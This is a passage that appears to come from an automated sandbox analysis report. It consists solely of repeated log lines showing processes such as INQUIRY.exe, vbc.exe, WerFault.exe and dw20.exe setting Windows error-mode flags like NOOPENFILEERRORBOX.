                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
